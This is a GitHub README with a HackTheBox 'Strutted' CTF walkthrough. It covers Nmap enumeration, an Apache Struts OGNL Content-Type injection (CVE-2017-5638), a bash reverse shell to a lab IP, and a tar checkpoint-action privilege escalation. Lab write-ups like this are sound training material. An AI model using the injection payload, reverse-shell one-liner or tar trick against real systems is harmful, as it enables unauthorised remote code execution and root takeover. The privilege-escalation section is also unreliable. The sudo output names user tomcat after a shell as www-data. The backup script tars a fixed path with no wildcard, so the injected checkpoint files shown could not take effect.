Skip to content

sivaadityacoder/hackthebox_writeups

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

1 Commit
Readme.md
Readme.md
Β 
Β 

Repository files navigation

Strutted - HackTheBox Walkthrough | Style

Machine Name: Strutted
Platform: HackTheBox
Difficulty: Easy
Category: Web Exploitation, Privilege Escalation
Tools Used: Nmap, curl, SearchSploit, Bash Reverse Shell, tar, sudo

Step 1: Enumeration

πŸ” Nmap Scan

We start by scanning the machine with Nmap:

nmap -sC -sV -oN nmap_initial 10.10.11.59

Nmap reveals port 80 open with an HTTP server running Apache Tomcat (Apache-Coyote/1.1).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

πŸ” HTTP Header Check

We verify with a manual curl check:

curl -I http://strutted.htb

The server responds with:

Server: Apache-Coyote/1.1

We’re dealing with Apache Tomcat. Given the name "Strutted", it hints at a vulnerable Apache Struts component.

Step 2: Vulnerability Discovery

We use SearchSploit to find a related vulnerability:

searchsploit struts

One interesting result:

Apache Struts 2.5 - Remote Code Execution (CVE-2017-5638)

We copy the exploit locally:

searchsploit -m java/remote/42966.java

The exploit uses a malicious Content-Type header to trigger RCE.

Step 3: Remote Code Execution

To test if the exploit works, we use a simple curl request like this:

curl -v -H "Content-Type: %{(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','RCE'))}.multipart/form-data" http://strutted.htb

Check for X-Test: RCE in the response headers.

βœ… Confirmed: We Have RCE

Let’s now craft a reverse shell.

Step 4: Getting a Reverse Shell

We use the bash one-liner reverse shell:

bash -i >& /dev/tcp/10.10.14.25/4444 0>&1

We encode this payload and modify the original exploit to deliver it.

On your attacker machine, set up a listener:

nc -lvnp 4444

Once the exploit runs, you’ll catch a shell:

bash: no job control in this shell
www-data@strutted:/var/lib/tomcat8$

We have a shell as www-data.

Step 5: Privilege Escalation

πŸ” Check sudo privileges:

sudo -l

You might see:

User tomcat may run the following command on strutted:
    (root) NOPASSWD: /opt/backup.sh

πŸ” Inspect the Script

cat /opt/backup.sh

Inside:

#!/bin/bash
tar -czf /root/backup.tar.gz /root/important

If the tar binary is exploitable (runs as root), we can use a tar wildcards exploit.

πŸ”“ Exploiting with Tar

We’ll use --checkpoint-action=exec=... to execute code:

echo 'touch /tmp/pwned' > payload.sh
chmod +x payload.sh

mkdir exploit
cd exploit
echo "" > "--checkpoint-action=exec=sh payload.sh"
echo "" > "--checkpoint=1"

sudo /opt/backup.sh

Check /tmp/pwned β€” if it exists, we’ve achieved code execution as root.

πŸ” Spawn a Root Shell

Replace payload with a reverse shell or setuid bash binary.

Final Flag

Once you have root, grab the root flag:

cat /root/root.txt

Mission complete.

Conclusion

The Strutted machine is a great beginner-friendly box to learn:

  • Apache Struts RCE (CVE-2017-5638)
  • Bash reverse shell delivery
  • Privilege escalation with tar checkpoint trick

This is a real-world example of chaining web exploits and system misconfigurations.

Credits

πŸ”— Walkthrough :
Strutted - HackTheBox

https://medium.com/@sivaaditya456

Thanks for reading! Follow me on Medium for more CTF & Red Team writeups.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published